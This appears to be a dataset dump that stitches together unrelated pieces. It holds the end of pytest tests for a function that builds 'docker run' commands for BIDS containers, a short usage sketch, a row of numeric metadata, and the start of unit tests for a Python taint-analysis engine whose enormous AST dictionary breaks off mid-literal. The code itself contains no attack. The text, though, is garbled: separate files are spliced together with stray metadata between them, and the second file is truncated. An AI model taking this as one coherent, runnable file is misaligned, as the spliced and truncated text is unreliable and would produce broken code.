                  "-v /project/vol2:/data/vol2 testorg/testim:dev /data/in " \
                  "/data/out participant"
    cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
                          docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
    assert cmd == correct_cmd, "cmd:\n%s\n does not match correct cmd:\n%s" % (cmd, correct_cmd)


def test_participant_label():
    """test participant label"""
    analysis_level = "participant"
    bids_input_folder = "/bids_in_data"
    bids_output_folder = "/bids_out_data"
    docker_image = "testorg/testim:dev"
    subject_id = "sub-11"
    docker_volumes = []
    runscript_args = ""
    runscript_cmd = ""
    correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev /data/in " \
                  "/data/out participant --participant_label sub-11"
    cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
                          docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
    assert cmd == correct_cmd, "cmd:\n%s\n does not match correct cmd:\n%s" % (cmd, correct_cmd)


def test_multiple_participant_labels():
    """test multiple participant labels"""
    analysis_level = "participant"
    bids_input_folder = "/bids_in_data"
    bids_output_folder = "/bids_out_data"
    docker_image = "testorg/testim:dev"
    subject_id = ["sub-11", "sub-12"]
    docker_volumes = []
    runscript_args = ""
    runscript_cmd = ""
    correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev /data/in " \
                  "/data/out participant --participant_label sub-11 sub-12"
    cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
                          docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
    assert cmd == correct_cmd, "cmd:\n%s\n does not match correct cmd:\n%s" % (cmd, correct_cmd)


def test_runscript_args():
    """test runscript args"""
    analysis_level = "participant"
    bids_input_folder = "/bids_in_data"
    bids_output_folder = "/bids_out_data"
    docker_image = "testorg/testim:dev"
    subject_id = ""
    docker_volumes = []
    runscript_args = "--testarg1 a --testarg2 b"
    runscript_cmd = ""
    correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev " \
                  "/data/in /data/out participant --testarg1 a --testarg2 b"
    cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
                          docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
    assert cmd == correct_cmd, "cmd:\n%s\n does not match correct cmd:\n%s" % (cmd, correct_cmd)


def test_runscript_cmd():
    """test runscript cmd"""
    analysis_level = "participant"
    bids_input_folder = "/bids_in_data"
    bids_output_folder = "/bids_out_data"
    docker_image = "testorg/testim:dev"
    subject_id = ""
    docker_volumes = []
    runscript_args = ""
    runscript_cmd = "python run.py"
    correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev " \
                  "python run.py /data/in /data/out participant"
    cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
                          docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
    assert cmd == correct_cmd, "cmd:\n%s\n does not match correct cmd:\n%s" % (cmd, correct_cmd)


def test_full_cmd():
    """test full cmd"""
    analysis_level = "participant"
    bids_input_folder = "/bids_in_data"
    bids_output_folder = "/bids_out_data"
    docker_image = "testorg/testim:dev"
    subject_id = "sub-11"
    docker_volumes = ["/project/vol1:/data/vol1", "/project/vol2:/data/vol2"]
    runscript_args = "--testarg1 a --testarg2 b"
    runscript_cmd = "python run.py"
    correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out -v /project/vol1:/data/vol1 " \
                  "-v /project/vol2:/data/vol2 testorg/testim:dev " \
                  "python run.py /data/in /data/out participant --participant_label sub-11 --testarg1 a --testarg2 b"
    cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
                          docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
    assert cmd == correct_cmd, "cmd:\n%s\n does not match correct cmd:\n%s" % (cmd, correct_cmd)


def test_docker_options():
    """test docker options"""
    analysis_level = "participant"
    bids_input_folder = "/bids_in_data"
    bids_output_folder = "/bids_out_data"
    docker_image = "testorg/testim:dev"
    subject_id = "sub-11"
    docker_volumes = ["/project/vol1:/data/vol1", "/project/vol2:/data/vol2"]
    runscript_args = "--testarg1 a --testarg2 b"
    runscript_cmd = "python run.py"
    docker_opt = "--entrypoint=/bin/bash"
    correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out -v /project/vol1:/data/vol1 " \
                  "-v /project/vol2:/data/vol2 --entrypoint=/bin/bash testorg/testim:dev " \
                  "python run.py /data/in /data/out participant --participant_label sub-11 --testarg1 a --testarg2 b"
    cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
                          docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd,
                          docker_opt=docker_opt)
    assert cmd == correct_cmd, "cmd:\n%s\n does not match correct cmd:\n%s" % (cmd, correct_cmd)
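Outside of pytest, compile_run_cmd can be called directly; this sketch mirrors the participant-label fixture above, so the expected output string is taken verbatim from the tests:

cmd = compile_run_cmd(
    "participant", "/bids_in_data", "/bids_out_data", "testorg/testim:dev", "sub-11",
    docker_volumes=[], runscript_args="", runscript_cmd="",
)
print(cmd)
# docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev /data/in /data/out participant --participant_label sub-11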
| 45.085859 | 118 | 0.681976 | 1,228 | 8,927 | 4.637622 | 0.057818 | 0.070237 | 0.104302 | 0.066725 | 0.93626 | 0.93626 | 0.93626 | 0.926427 | 0.923266 | 0.923266 | 0 | 0.007843 | 0.200179 | 8,927 | 197 | 119 | 45.314721 | 0.789776 | 0.030469 | 0 | 0.824324 | 0 | 0.087838 | 0.332287 | 0.095188 | 0 | 0 | 0 | 0 | 0.067568 | 1 | 0.067568 | false | 0 | 0.006757 | 0 | 0.074324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
873d718b6b4a9ce596cb21dfe1128d1d96348755 | 42,114 | py | Python |
test/unit_test.py | lwzSoviet/finale | 6166bee0ddbd1d886abccee0c1c699eaf8f53040 | ["MIT"] | 2 | 2021-07-13T12:13:36.000Z | 2021-11-14T04:43:47.000Z |
test/unit_test.py | lwzSoviet/finale | 6166bee0ddbd1d886abccee0c1c699eaf8f53040 | ["MIT"] | null | null | null |
test/unit_test.py | lwzSoviet/finale | 6166bee0ddbd1d886abccee0c1c699eaf8f53040 | ["MIT"] | null | null | null |
#!/usr/bin/python2
# -*- coding: utf-8 -*-
"""
@Description: Simple Unit Test
~~~~~~
@Author : pake
@Time : 2021/7/2 10:10
"""
import pytest
from engine import func_equals_classcall, add_node_id, get_node, get_name_value, get_arg_value, \
    get_all_assigns, get_all_functiondef, get_all_classdef, get_end_id, get_call_details, is_tracked, is_controllable, \
    ins_is_class, get_class_name, Point, gen_chains, Taint


def test_func_equals_classcall():
    # call_name, classcall_name
    p = [('os.system', 'ClassCall:System.system'),
         ('a.system', 'ClassCall:A.system'),
         ('pickle.loads', 'ClassCall:self.loads'),
         ('self.inital_db', 'ClassCall:Mysql.inital_db'), ]
    for i in p:
        assert func_equals_classcall(i[0], i[1]) == i[1]


def test_add_node_id():
a={'name': 'Module', 'children': [{'name': 'Import', 'children': [{'name': 'alias', 'children': [{'name': 'str(str=os)'}, {'name': 'NoneType'}]}]}, {'name': 'ImportFrom', 'children': [{'name': 'str(str=importlib)'}, {'name': 'alias', 'children': [{'name': 'str(str=import_module)'}, {'name': 'NoneType'}]}, {'name': 'int(int=0)'}]}, {'name': 'ImportFrom', 'children': [{'name': 'str'}, {'name': 'alias', 'children': [{'name': 'str(str=ImproperlyConfigured)'}, {'name': 'NoneType'}]}, {'name': 'int(int=0)'}]}, {'name': 'ImportFrom', 'children': [{'name': 'str'}, {'name': 'alias', 'children': [{'name': 'str(str=upath)'}, {'name': 'NoneType'}]}, {'name': 'int(int=0)'}]}, {'name': 'ImportFrom', 'children': [{'name': 'str'}, {'name': 'alias', 'children': [{'name': 'str(str=module_has_submodule)'}, {'name': 'NoneType'}]}, {'name': 'int(int=0)'}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=MODELS_MODULE_NAME)'}, {'name': 'Store'}]}, {'name': 'Str', 'children': [{'name': 'str(str=models)'}]}]}, {'name': 'ClassDef', 'children': [{'name': 'str(str=AppConfig)'}, {'name': 'Name', 'children': [{'name': 'str(str=object)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=__init__)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=app_name)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=app_module)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'list[]'}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=name)'}, {'name': 'Store'}]}, {'name': 'Name', 'children': [{'name': 'str(str=app_name)'}, {'name': 'Load'}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=module)'}, {'name': 'Store'}]}, {'name': 'Name', 'children': [{'name': 'str(str=app_module)'}, {'name': 'Load'}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=apps)'}, {'name': 'Store'}]}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}]}, {'name': 'If', 'children': [{'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=hasattr)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str(str=label)'}]}, {'name': 'list[]'}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=label)'}, {'name': 'Store'}]}, {'name': 'Subscript', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=app_name)'}, {'name': 'Load'}]}, {'name': 'str(str=rpartition)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'list[]'}]}, {'name': 'Index', 'children': [{'name': 'Num', 'children': [{'name': 'int(int=2)'}]}]}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'If', 'children': 
[{'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=hasattr)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str(str=verbose_name)'}]}, {'name': 'list[]'}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=verbose_name)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=label)'}, {'name': 'Load'}]}, {'name': 'str(str=title)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'list[]'}]}]}, {'name': 'list[]'}]}, {'name': 'If', 'children': [{'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=hasattr)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str(str=path)'}]}, {'name': 'list[]'}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=path)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=_path_from_module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=app_module)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'list[]'}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=models_module)'}, {'name': 'Store'}]}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=models)'}, {'name': 'Store'}]}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=__repr__)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'list[]'}]}, {'name': 'Return', 'children': [{'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Tuple', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=__class__)'}, {'name': 'Load'}]}, {'name': 'str(str=__name__)'}, {'name': 'Load'}]}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=label)'}, {'name': 'Load'}]}, {'name': 'Load'}]}]}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=_path_from_module)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=module)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 
'list[]'}, {'name': 'NoneType'}, {'name': 'list[]'}]}, {'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=list)'}, {'name': 'Load'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=getattr)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str(str=__path__)'}]}, {'name': 'List', 'children': [{'name': 'list[]'}, {'name': 'Load'}]}, {'name': 'list[]'}]}, {'name': 'list[]'}]}]}, {'name': 'If', 'children': [{'name': 'Compare', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=len)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}, {'name': 'NotEq'}, {'name': 'Num', 'children': [{'name': 'int(int=1)'}]}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=filename)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=getattr)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str(str=__file__)'}]}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}, {'name': 'list[]'}]}]}, {'name': 'If', 'children': [{'name': 'Compare', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=filename)'}, {'name': 'Load'}]}, {'name': 'IsNot'}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Store'}]}, {'name': 'List', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=os)'}, {'name': 'Load'}]}, {'name': 'str(str=path)'}, {'name': 'Load'}]}, {'name': 'str(str=dirname)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=filename)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}, {'name': 'Load'}]}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=list)'}, {'name': 'Load'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=set)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}, {'name': 'list[]'}]}]}]}, {'name': 'list[]'}]}, {'name': 'If', 'children': [{'name': 'Compare', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=len)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}, {'name': 'Gt'}, {'name': 'Num', 'children': [{'name': 'int(int=1)'}]}]}, {'name': 'Raise', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImproperlyConfigured)'}, {'name': 'Load'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Tuple', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Load'}]}, {'name': 'Load'}]}]}, 
{'name': 'list[]'}]}, {'name': 'NoneType'}]}, {'name': 'If', 'children': [{'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Load'}]}]}, {'name': 'Raise', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImproperlyConfigured)'}, {'name': 'Load'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Tuple', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'NoneType'}]}, {'name': 'list[]'}]}]}, {'name': 'Return', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=upath)'}, {'name': 'Load'}]}, {'name': 'Subscript', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Load'}]}, {'name': 'Index', 'children': [{'name': 'Num', 'children': [{'name': 'int(int=0)'}]}]}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=create)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=cls)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=entry)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'list[]'}]}, {'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}]}, {'name': 'Try', 'children': [{'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=import_module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'ExceptHandler', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImportError)'}, {'name': 'Load'}]}, {'name': 'NoneType'}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Store'}]}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}]}, {'name': 'Assign', 'children': [{'name': 'Tuple', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=mod_path)'}, {'name': 'Store'}]}, {'name': 'Name', 'children': [{'name': 'str(str=_)'}, {'name': 'Store'}]}, {'name': 'Name', 'children': [{'name': 'str(str=cls_name)'}, {'name': 'Store'}]}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}, {'name': 'str(str=rpartition)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'list[]'}]}]}, {'name': 'If', 'children': [{'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Name', 'children': [{'name': 'str(str=mod_path)'}, {'name': 'Load'}]}]}, {'name': 'Raise', 'children': [{'name': 'NoneType'}, {'name': 'NoneType'}]}, {'name': 'list[]'}]}]}, {'name': 'Try', 'children': [{'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Store'}]}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'str(str=default_app_config)'}, {'name': 'Load'}]}]}, {'name': 'ExceptHandler', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=AttributeError)'}, {'name': 'Load'}]}, {'name': 'NoneType'}, {'name': 'Return', 
'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=cls)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}]}, {'name': 'Assign', 'children': [{'name': 'Tuple', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=mod_path)'}, {'name': 'Store'}]}, {'name': 'Name', 'children': [{'name': 'str(str=_)'}, {'name': 'Store'}]}, {'name': 'Name', 'children': [{'name': 'str(str=cls_name)'}, {'name': 'Store'}]}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}, {'name': 'str(str=rpartition)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'list[]'}]}]}, {'name': 'list[]'}]}, {'name': 'list[]'}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=mod)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=import_module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=mod_path)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'Try', 'children': [{'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=cls)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=getattr)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=mod)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=cls_name)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'ExceptHandler', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=AttributeError)'}, {'name': 'Load'}]}, {'name': 'NoneType'}, {'name': 'If', 'children': [{'name': 'Compare', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'Is'}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}]}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=import_module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'Raise', 'children': [{'name': 'NoneType'}, {'name': 'NoneType'}]}]}]}, {'name': 'list[]'}, {'name': 'list[]'}]}, {'name': 'If', 'children': [{'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=issubclass)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=cls)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=AppConfig)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'Raise', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImproperlyConfigured)'}, {'name': 'Load'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'NoneType'}]}, {'name': 'list[]'}]}, {'name': 'Try', 'children': [{'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=app_name)'}, {'name': 'Store'}]}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=cls)'}, {'name': 'Load'}]}, {'name': 'str(str=name)'}, {'name': 'Load'}]}]}, {'name': 'ExceptHandler', 'children': 
[{'name': 'Name', 'children': [{'name': 'str(str=AttributeError)'}, {'name': 'Load'}]}, {'name': 'NoneType'}, {'name': 'Raise', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImproperlyConfigured)'}, {'name': 'Load'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'NoneType'}]}]}, {'name': 'list[]'}, {'name': 'list[]'}]}, {'name': 'Try', 'children': [{'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=app_module)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=import_module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=app_name)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'ExceptHandler', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImportError)'}, {'name': 'Load'}]}, {'name': 'NoneType'}, {'name': 'Raise', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImproperlyConfigured)'}, {'name': 'Load'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Tuple', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=app_name)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=mod_path)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=cls_name)'}, {'name': 'Load'}]}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'NoneType'}]}]}, {'name': 'list[]'}, {'name': 'list[]'}]}, {'name': 'Return', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=cls)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=app_name)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=app_module)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'Name', 'children': [{'name': 'str(str=classmethod)'}, {'name': 'Load'}]}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=get_model)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=model_name)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=require_ready)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'NameConstant', 'children': [{'name': 'bool(int=True)'}]}]}, {'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}]}, {'name': 